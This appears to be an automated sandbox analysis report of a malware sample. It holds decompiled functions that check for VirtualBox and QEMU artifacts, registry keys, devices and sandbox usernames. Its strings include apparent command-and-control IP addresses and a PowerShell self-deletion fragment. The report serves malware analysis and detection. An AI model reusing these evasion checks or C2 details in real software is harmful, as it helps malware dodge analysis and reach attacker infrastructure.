TlsGetValue TlsSetValue 47991->48044 47993 21ef2fe946e 48045 21ef301cf50 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47993->48045 47995 21ef2fe947b 47996 21ef2fe6530 5 API calls 47995->47996 47997 21ef2fe957f 47996->47997 47998 21ef2fe6400 5 API calls 47997->47998 47999 21ef2fe9603 47998->47999 48000 21ef2fe6400 5 API calls 47999->48000 48008 21ef2fe9654 48000->48008 48002 21ef2fea821 Sleep 48002->48008 48007 21ef2fea710 Sleep 48011 21ef2fea15f 48007->48011 48008->48011 48046 21ef2ff5850 72 API calls _CxxThrowException 48008->48046 48047 21ef2ff5cd0 72 API calls _CxxThrowException 48008->48047 48048 21ef2febb60 RaiseException 48008->48048 48010 21ef2fead20 48011->48008 48011->48010 48012 21ef2feaab5 48011->48012 48049 21ef2fe5d10 19 API calls 48011->48049 48050 21ef3111c60 15 API calls _Tolower 48011->48050 48051 21ef3111c60 15 API calls _Tolower 48011->48051 48013 21ef2fe6530 5 API calls 48012->48013 48014 21ef2feab02 48013->48014 48015 21ef2fe6400 5 API calls 48014->48015 48016 21ef2feab30 __security_init_cookie 48015->48016 48052 21ef2fe9020 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48016->48052 48018 21ef2feab43 48053 21ef2feb660 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48018->48053 48020 21ef2feab50 48054 21ef2fe82c0 5 API calls ctype 48020->48054 48022 21ef2feab64 48055 21ef2fe8170 5 API calls ctype 48022->48055 48024 21ef2feac4b 48056 21ef2fe82c0 5 API calls ctype 48024->48056 48026 21ef2feac62 48057 21ef2fe8170 5 API calls ctype 48026->48057 48028 21ef2feac78 48058 21ef2fe8170 5 API calls ctype 48028->48058 48030 21ef2feac9e 48059 21ef2feaf10 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 48030->48059 48032 21ef2feacc3 48060 21ef2ff5cd0 72 API calls _CxxThrowException 48032->48060 48035 21ef301e0e0 48034->48035 48036 21ef30210e0 12 API calls 48035->48036 48037 21ef301e0f7 48035->48037 48036->48035 48038 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 48037->48038 
48039 21ef2fe9069 ExitProcess 48038->48039 48039->47965 48039->47966 48040->47985 48041->47987 48042->47989 48043->47991 48044->47993 48045->47995 48046->48008 48047->48008 48048->48008 48049->48011 48050->48007 48051->48002 48052->48018 48053->48020 48054->48022 48055->48024 48056->48026 48057->48028 48058->48030 48059->48032 48060->48010

                                        Control-flow Graph

                                        C-Code - Quality: 42%
                                        			E0000021E21EF301E430(long long __rbx, signed long long __rdi, long long __rsi) {
                                        				int _t63;
                                        				signed char _t65;
                                        				void* _t72;
                                        				void* _t80;
                                        				void* _t84;
                                        				signed long long _t97;
                                        				signed long long _t118;
                                        				void* _t139;
                                        				signed long long _t144;
                                        				WCHAR* _t149;
                                        				void* _t150;
                                        				void* _t152;
                                        				signed long long _t153;
                                        				void* _t155;
                                        
                                        				_t144 = __rdi;
                                        				 *((long long*)(_t152 + 8)) = __rbx;
                                        				 *((long long*)(_t152 + 0x10)) = __rsi;
                                        				 *((long long*)(_t152 + 0x18)) = __rdi;
                                        				_t150 = _t152 - 0x5f0;
                                        				_t153 = _t152 - 0x6f0;
                                        				_t97 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t150 + 0x5e0) = _t97 ^ _t153;
                                        				 *((long long*)(_t153 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
                                        				r8d = 0x208;
                                        				 *((long long*)(_t153 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
                                        				 *((long long*)(_t153 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
                                        				 *((long long*)(_t153 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
                                        				 *((long long*)(_t153 + 0x50)) = L"System32\\vboxdisp.dll";
                                        				 *((long long*)(_t153 + 0x58)) = L"System32\\vboxhook.dll";
                                        				 *((long long*)(_t153 + 0x60)) = L"System32\\vboxmrxnp.dll";
                                        				 *((long long*)(_t153 + 0x68)) = L"System32\\vboxogl.dll";
                                        				 *((long long*)(_t153 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
                                        				 *((long long*)(_t153 + 0x78)) = L"System32\\vboxoglcrutil.dll";
                                        				 *((long long*)(_t150 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
                                        				 *((long long*)(_t150 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
                                        				 *((long long*)(_t150 - 0x70)) = L"System32\\vboxoglpackspu.dll";
                                        				 *((long long*)(_t150 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
                                        				 *((long long*)(_t150 - 0x60)) = L"System32\\vboxservice.exe";
                                        				 *((long long*)(_t150 - 0x58)) = L"System32\\vboxtray.exe";
                                        				 *((long long*)(_t150 - 0x50)) = L"System32\\VBoxControl.exe";
                                        				E0000021E21EF310E410(_t72, 0, _t80, _t84, _t150 + 0x1d0, _t139, __rdi, _t155);
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t72, 0, _t80, _t84, _t150 - 0x40, _t139, _t144, _t155);
                                        				 *(_t153 + 0x28) = _t144;
                                        				_t63 = GetWindowsDirectoryW(_t149);
                                        				0xf3020e50();
                                        				if (_t63 == 0) goto 0xf301e577;
                                        				__imp__Wow64DisableWow64FsRedirection();
                                        				_t118 = _t144;
                                        				__imp__PathCombineW();
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t72, 0, 0, _t84, _t150 + 0x3e0, _t150 + 0x1d0, _t144,  *((intOrPtr*)(_t153 + 0x30 + _t118 * 8)));
                                        				0xf301e130();
                                        				_t65 = GetFileAttributesW(??); // executed
                                        				if (_t65 == 0xffffffff) goto 0xf301e5d9;
                                        				if ((_t65 & 0x00000010) == 0) goto 0xf301e5e4;
                                        				if (_t118 + 1 - 0x11 < 0) goto 0xf301e580;
                                        				goto 0xf301e5e9;
                                        				 *((intOrPtr*)(_t153 + 0x20)) = 0;
                                        				if ( *0xf3204490 == 8) goto 0xf301e612;
                                        				if (1 - 0x1e < 0) goto 0xf301e600;
                                        				goto 0xf301e671;
                                        				if ( *0x21EF32044E4 == dil) goto 0xf301e671;
                                        				if ( *0xf3204490 == 8) goto 0xf301e63a;
                                        				if (1 - 0x1e < 0) goto 0xf301e628;
                                        				goto 0xf301e64f;
                                        				if ( *((intOrPtr*)(0x21ef32044e4)) == dil) goto 0xf301e64f;
                                        				GetCurrentProcess();
                                        				 *((long long*)( *0x21EF32044E8))();
                                        				if ( *((intOrPtr*)(_t153 + 0x20)) == 0) goto 0xf301e671;
                                        				__imp__Wow64RevertWow64FsRedirection();
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}


















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                        • API String ID: 2137468328-1036852472
                                        • Opcode ID: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction ID: 170fb5ebd68fdcd2d0fadfeee845432590fc04343494a2f8acca79813087c2ae
                                        • Opcode Fuzzy Hash: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction Fuzzy Hash: 07610236610B4095EB119B14EC882DE73F5FBA8784F960226DE8D43BA9EE3CC55AC740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 21%
                                        			E0000021E21EF301EC20(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
                                        				void* _t80;
                                        				void* _t81;
                                        				signed char _t87;
                                        				void* _t88;
                                        				intOrPtr _t91;
                                        				void* _t107;
                                        				signed long long _t128;
                                        				long long _t132;
                                        				intOrPtr* _t151;
                                        				long long _t187;
                                        				void* _t189;
                                        				void* _t190;
                                        				signed long long _t191;
                                        				long long _t201;
                                        				void* _t205;
                                        
                                        				_t187 = __rsi;
                                        				_t189 = _t190 - 0x47;
                                        				_t191 = _t190 - 0xb0;
                                        				_t128 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t189 + 0x37) = _t128 ^ _t191;
                                        				r12d = 0;
                                        				 *((long long*)(_t189 + 0x1f)) = L"vboxvideo";
                                        				 *((long long*)(_t189 - 0x21)) = _t201;
                                        				 *((long long*)(_t189 + 0x27)) = L"VBoxVideoW8";
                                        				_t132 = L"VBoxWddm";
                                        				 *((long long*)(_t189 - 0x11)) = _t201;
                                        				 *((long long*)(_t189 + 0x2f)) = _t132;
                                        				r15d = r12d;
                                        				 *((long long*)(_t189 - 0x29)) = _t201;
                                        				_t81 = E0000021E21EF30211C0(_t80, _t189 - 0x21, _t189 - 0x11, __rsi); // executed
                                        				if (_t81 == 0) goto 0xf301ef2b;
                                        				 *((long long*)(_t191 + 0xd0)) = __rbx;
                                        				 *((long long*)(_t191 + 0xd8)) = _t187;
                                        				 *((long long*)(_t191 + 0xe0)) = __rdi;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				if (_t132 == 0) goto 0xf301ed20;
                                        				if (_t132 == 0) goto 0xf301ed17;
                                        				 *((long long*)(_t191 + 0x28)) = _t189 - 0x29;
                                        				_t18 = _t201 + 0x30; // 0x30
                                        				r9d = _t18;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0xa0))() >= 0) goto 0xf301ed17;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (_t132 == 0) goto 0xf301ed2e;
                                        				__imp__#6();
                                        				if (r12d == 0) goto 0xf301eef7;
                                        				_t151 =  *((intOrPtr*)(_t189 - 0x29));
                                        				 *((long long*)(_t189 - 0x31)) = _t201;
                                        				 *((intOrPtr*)(_t189 - 0x35)) = r12d;
                                        				if (_t151 == 0) goto 0xf301eed7;
                                        				 *((long long*)(_t191 + 0xe8)) = __r14;
                                        				if (r15d != 0) goto 0xf301eecf;
                                        				 *((long long*)(_t191 + 0x20)) = _t189 - 0x35;
                                        				_t32 = _t205 + 1; // 0x1, executed
                                        				r8d = _t32;
                                        				 *((intOrPtr*)( *_t151 + 0x20))();
                                        				if ( *((intOrPtr*)(_t189 - 0x35)) == r12d) goto 0xf301eecb;
                                        				 *((long long*)(_t191 + 0x28)) = _t201;
                                        				r8d = 0;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))() < 0) goto 0xf301eeb2;
                                        				_t87 =  *(_t189 - 9) & 0x0000ffff;
                                        				if (_t87 == 1) goto 0xf301eeb2;
                                        				if ((_t87 & 0x00000008) == 0) goto 0xf301eea8;
                                        				__imp__StrCmpIW();
                                        				if (_t87 != 0) goto 0xf301eea8;
                                        				__imp__#9();
                                        				 *((long long*)(_t191 + 0x28)) = _t201;
                                        				r8d = 0;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))();
                                        				__imp__#23();
                                        				if (_t88 < 0) goto 0xf301eea8;
                                        				__imp__#20();
                                        				_t55 = _t205 + 1; // 0x1
                                        				__imp__#19();
                                        				_t107 =  *((intOrPtr*)(_t189 - 0x19)) -  *((intOrPtr*)(_t189 - 0x15)) + 1;
                                        				 *((intOrPtr*)(_t189 - 0x39)) = r12d;
                                        				if (_t107 <= 0) goto 0xf301ee9f;
                                        				__imp__#25(); // executed
                                        				if (E0000021E21EF3120790(_t55,  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))),  *((intOrPtr*)(_t189 + 0xf)),  *((intOrPtr*)(_t189 + 0x1f))) == 0) goto 0xf301ee99;
                                        				if (r12d + 1 - 3 < 0) goto 0xf301ee70;
                                        				_t91 =  *((intOrPtr*)(_t189 - 0x39)) + 1;
                                        				 *((intOrPtr*)(_t189 - 0x39)) = _t91;
                                        				if (_t91 - _t107 < 0) goto 0xf301ee50;
                                        				goto 0xf301ee9f;
                                        				r15d = 1;
                                        				__imp__#24();
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x10))();
                                        				if ( *((intOrPtr*)(_t189 - 0x29)) != 0) goto 0xf301ed53;
                                        				goto 0xf301eecf;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x29)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				E0000021E21EF310C290();
                                        				return r15d;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                                        • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                                        • API String ID: 1020912672-1865646205
                                        • Opcode ID: 1365cdf0c3cf057d5e9c74e6631ed414abe84b80192fdf32d0dd480e151a30fb
                                        • Instruction ID: 6c6b74f22371ff005cb052beecb0a91cdc931201dfc1fa34300635f5e8df3883
                                        • Opcode Fuzzy Hash: 1365cdf0c3cf057d5e9c74e6631ed414abe84b80192fdf32d0dd480e151a30fb
                                        • Instruction Fuzzy Hash: 8A910F76700A508AEB20DF61E8987DE73B0F798B88F424512DE4A67F68DF38C55AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitHandleInitializeProcess$AddressCloseCreateErrorEventLastModuleProcSecurityUninitialize_invalid_parameter_noinfo
                                        • String ID: " -Force$2104a$282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$444$; Remove-Item -Path "$BLACK$powershell$response_status$tasks
                                        • API String ID: 2740944658-2167360499
                                        • Opcode ID: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction ID: 2f3fc143dde432a1ac57ec69bd36a79ae850c94bf61b0d5a8c48d42230e76055
                                        • Opcode Fuzzy Hash: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction Fuzzy Hash: 38527872220BC689EF219B64DC483DE23A5F761758F410616DE592BEDADF78C686C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E0000021E21EF301F9C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				signed int _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed char _t78;
                                        				signed char _t81;
                                        				signed char _t84;
                                        				void* _t94;
                                        				void* _t128;
                                        				intOrPtr* _t137;
                                        				long long _t167;
                                        				void* _t180;
                                        				long long _t185;
                                        
                                        				_t167 = __rsi;
                                        				r15d = 0;
                                        				_a32 = _t185;
                                        				_v88 = _t185;
                                        				_a24 = _t185;
                                        				_t72 = E0000021E21EF30211C0(_t71,  &_a32,  &_v88, __rsi); // executed
                                        				if (_t72 == 0) goto 0xf301fc43;
                                        				_v32 = _t167;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0xf301fa8a;
                                        				if (__rax == 0) goto 0xf301fa81;
                                        				_v96 =  &_a24;
                                        				_t13 = _t185 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t185;
                                        				_t179 =  *_a32;
                                        				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0xf301fa81;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0xf301fa9d;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301fc33;
                                        				_t137 = _a24;
                                        				_a16 = _t185;
                                        				_a8 = r15d;
                                        				if (_t137 == 0) goto 0xf301fc13;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t137 + 0x20))();
                                        				if (_a8 == r15d) goto 0xf301fc0f;
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fb48;
                                        				_t78 = _v80 & 0x0000ffff;
                                        				if (_t78 == r12w) goto 0xf301fb48;
                                        				if ((_t78 & 0x00000008) == 0) goto 0xf301fb3e;
                                        				E0000021E21EF310E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                                        				_t92 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fb9d;
                                        				_t81 = _v80 & 0x0000ffff;
                                        				if (_t81 == r12w) goto 0xf301fb9d;
                                        				if ((_t81 & 0x00000008) == 0) goto 0xf301fb93;
                                        				E0000021E21EF310E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                                        				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				_v96 = _t185;
                                        				r8d = 0;
                                        				_v104 = _t185;
                                        				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fbf2;
                                        				_t84 = _v80 & 0x0000ffff;
                                        				if (_t84 == r12w) goto 0xf301fbf2;
                                        				if ((_t84 & 0x00000008) == 0) goto 0xf301fbe8;
                                        				E0000021E21EF310E5B0(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
                                        				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				if (_t94 != 0) goto 0xf301fc0f;
                                        				if (_a24 != 0) goto 0xf301fad0;
                                        				goto 0xf301fc13;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t94;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                                        • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                                        • API String ID: 2434920835-607120894
                                        • Opcode ID: cc10c454dd6f36fa67e0efdb553e1708b2252111ce35cecdcd5a4126dbaff4f9
                                        • Instruction ID: a441cdd534e73a8916fc5441327be697259acdb577ee0dddd6b83dbac4588116
                                        • Opcode Fuzzy Hash: cc10c454dd6f36fa67e0efdb553e1708b2252111ce35cecdcd5a4126dbaff4f9
                                        • Instruction Fuzzy Hash: 6D811476300B5186EF10EF25E89869E27B0FB98B98F465516EE4A43E68DF38C486C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                                        • API String ID: 2645101109-2358638013
                                        • Opcode ID: f2deb0c914bb9bdb1558aab4743327aa1cd36bb3b5ebdf950a90f1c8705d3a96
                                        • Instruction ID: 7cf379e721366eecf48ff00925ef21e6bd9d8d183d9261603ddbca9f4e9d97d7
                                        • Opcode Fuzzy Hash: f2deb0c914bb9bdb1558aab4743327aa1cd36bb3b5ebdf950a90f1c8705d3a96
                                        • Instruction Fuzzy Hash: C9419335205B8495EA619B01EC883DB73F8F7A8B80F520226DE8C07B65EF7CC956CB44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF301E2E0(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				long long _v576;
                                        				long long _v584;
                                        				long long _v592;
                                        				long long _v600;
                                        				long long _v608;
                                        				long long _v616;
                                        				char _v632;
                                        				long long _v648;
                                        				void* __rdi;
                                        				long _t27;
                                        				void* _t32;
                                        				void* _t35;
                                        				void* _t37;
                                        				signed long long _t41;
                                        				void* _t62;
                                        				void* _t64;
                                        				void* _t68;
                                        				void* _t71;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_t41 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t41 ^ _t68 - 0x000002a0;
                                        				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
                                        				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
                                        				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
                                        				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
                                        				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
                                        				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
                                        				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
                                        				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
                                        				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t32, 0, _t35, _t37,  &_v536, _t62, _t64, _t71);
                                        				0xf301e130();
                                        				_v632 = __rsi;
                                        				r9d = 0x20019;
                                        				_v648 =  &_v632;
                                        				r8d = 0;
                                        				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                                        				if (_t27 == 0) goto 0xf301e3ef;
                                        				if (__rbx + 1 - 9 < 0) goto 0xf301e380;
                                        				goto 0xf301e3ff;
                                        				RegCloseKey(??);
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                        Similarity
                                        • API ID: Sleep$ExitObjectProcessSingleWait
                                        • String ID: 2104a$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$BLACK
                                        Similarity
                                        • API ID: Initialize$CreateInstanceSecurityUninitialize
                                        • String ID: ROOT\CIMV2
                                        C-Code - Quality: 34%
                                        			E0000021E21EF301FE00(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				void* _v1064;
                                        				char _v1592;
                                        				long long _v1608;
                                        				long long _v1616;
                                        				intOrPtr _v1624;
                                        				void* __rdi;
                                        				signed char _t29;
                                        				void* _t31;
                                        				void* _t38;
                                        				void* _t41;
                                        				signed long long _t48;
                                        				void* _t63;
                                        				void* _t68;
                                        				void* _t75;
                                        				void* _t78;
                                        				void* _t81;
                                        
                                        				_t81 = __r9;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_t48 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t48 ^ _t75 - 0x00000670;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t31, 0, _t38, _t41,  &_v1592, _t63, _t68, _t78);
                                        				_a8 = __rbx;
                                        				_v1616 = L"qemu-ga";
                                        				_v1608 = L"SPICE Guest Tools";
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t31, 0, 0, _t41,  &_v536, _t63, _t68, _t78);
                                        				_v1624 = 0;
                                        				if ( *0xf3204490 == 8) goto 0xf301ff49;
                                        				if (1 - 0x1e < 0) goto 0xf301fe91;
                                        				r9d = 0;
                                        				_t11 = _t81 + 0x26; // 0x26
                                        				r8d = _t11;
                                        				__imp__SHGetSpecialFolderPathW();
                                        				__imp__PathCombineW();
                                        				0xf301e130();
                                        				_t29 = GetFileAttributesW(??); // executed
                                        				if (_t29 == 0xffffffff) goto 0xf301ff0d;
                                        				if ((_t29 & 0x00000010) != 0) goto 0xf301ffc8;
                                        				if (_t68 + 1 - 2 < 0) goto 0xf301fe70;
                                        				E0000021E21EF310C290();
                                        				return 0;
                                        			}

                                        Similarity
                                        • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                                        • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                                        Similarity
                                        • API ID: Heap$Process$AdaptersAllocFreeInfo
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                        Similarity
                                        • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                                        C-Code - Quality: 68%
                                        			E0000021E21EF301FC50(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v544;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				long long _v576;
                                        				char _v584;
                                        				void* __rdi;
                                        				void* _t20;
                                        				void* _t23;
                                        				void* _t26;
                                        				void* _t27;
                                        				signed long long _t31;
                                        				long long _t40;
                                        				void* _t45;
                                        				void* _t47;
                                        				void* _t52;
                                        				void* _t55;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_t31 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t31 ^ _t52 - 0x00000260;
                                        				_v584 = L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0";
